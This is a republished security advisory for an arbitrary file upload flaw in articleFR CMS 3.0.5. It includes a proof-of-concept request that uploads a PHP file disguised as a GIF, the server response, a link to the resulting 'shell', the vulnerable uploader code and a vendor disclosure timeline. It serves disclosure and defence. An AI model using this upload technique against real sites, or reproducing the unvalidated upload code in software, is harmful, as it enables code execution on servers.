Lucene search
K

articleFR CMS 3.0.5 Arbitrary File Upload Vulnerability

🗓️ 22 Jan 2015 00:00:00Reported by Tien Tran DinhType 
zdt
 zdt
🔗 0day.today👁 184 Views

articleFR CMS 3.0.5 Arbitrary File Upload Vulnerability in MyVideo Upload Functionality with Unrestricted File Type Acceptanc

Code
#Vulnerability title: Arbitrary File Upload in articleFR CMS 3.0.5
#Product: articleFR CMS
#Vendor: http://freereprintables.com
#Affected version: version 3.0.5 
#Download link: https://github.com/articlefr/articleFR
#Fixed version: N/A
#Author: Tran Dinh Tien ([email protected]) & ITAS Team (www.itas.vn)


::DESCRITION::
- Vulnerabilities related to the upload of unexpected file types is unique in that the upload should quickly reject a file if it does not have a specific extension. Additionally, this is different from uploading malicious files in that in most cases an incorrect file format may not by it self be inherently "malicious" but may be detrimental to the saved data. 
- The application may be expecting only certain file types to be uploaded for processing, such as mpeg4, ogv, ogg, 3gp, webm, gif, mkv, flv, drc, mng, avi,... files. The application may not validate the uploaded file by extension (for low assurance file validation) or content (high assurance file validation).



::PROOF OF CONCEPT::

- REQUEST:

POST /articlefr/dashboard/videouploader.php HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/articlefr/dashboard/videos/fileupload/
Content-Length: 414
Content-Type: multipart/form-data; boundary=---------------------------277651700022570
Cookie: GEAR=local-5422433b500446ead50002d4; PHPSESSID=uc86lsmbm53d73d572tvvec3v4; _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-9; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

-----------------------------277651700022570
Content-Disposition: form-data; name="myVideo"; filename="img.php"
Content-Type: image/gif

<?php 
phpinfo(); 
?>
-----------------------------277651700022570
Content-Disposition: form-data; name=""

undefined
-----------------------------277651700022570
Content-Disposition: form-data; name=""

undefined
-----------------------------277651700022570--



- RESPONSE:

HTTP/1.1 200 OK
Date: Mon, 22 Dec 2014 03:10:30 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Type: text/html
Vary: Accept-Encoding
Accept-Ranges: none
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 36

[String_Random].php

- Shell link: http://target.org/articlefr2/dashboard/videos/[String_Random].php


- Vulnerable file: articlefr/dashboard/videouploader.php

- Vulnerable code:

<?php
$output_dir = dirname(dirname(__FILE__)) . "/videos_repository/";
if(isset($_FILES["myVideo"]))
{
  $ret = array();

  $error =$_FILES["myVideo"]["error"];
  
  if(!is_array($_FILES["myVideo"]["name"])) 
  {
      $fileName = $_FILES["myVideo"]["name"];
      $extension = pathinfo($fileName, PATHINFO_EXTENSION);
      $newFileName = md5(uniqid() . $fileName) . '.' . $extension;
      
     move_uploaded_file($_FILES["myVideo"]["tmp_name"], $output_dir.$newFileName);
      $ret[]= $newFileName;
  }
  
    echo $newFileName;
 }
 ?>

 
 
 
::DISCLOSURE::
+ 12/09/2014: Contact to vendor - vendor did not reply
+ 12/11/2014: Contact to vendor - vendor did not reply
+ 12/22/2014: Contact to vendor - vendor replied
+ 12/23/2014: Send the detail vulnerability to vendor - vendor did not reply
+ 01/21/2015: Public information


::REFERENCE::
- http://www.itas.vn/news/itas-team-phat-hien-lo-hong-arbitrarily-file-upload-trong-articlefr-cms-71.html

#  0day.today [2018-04-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation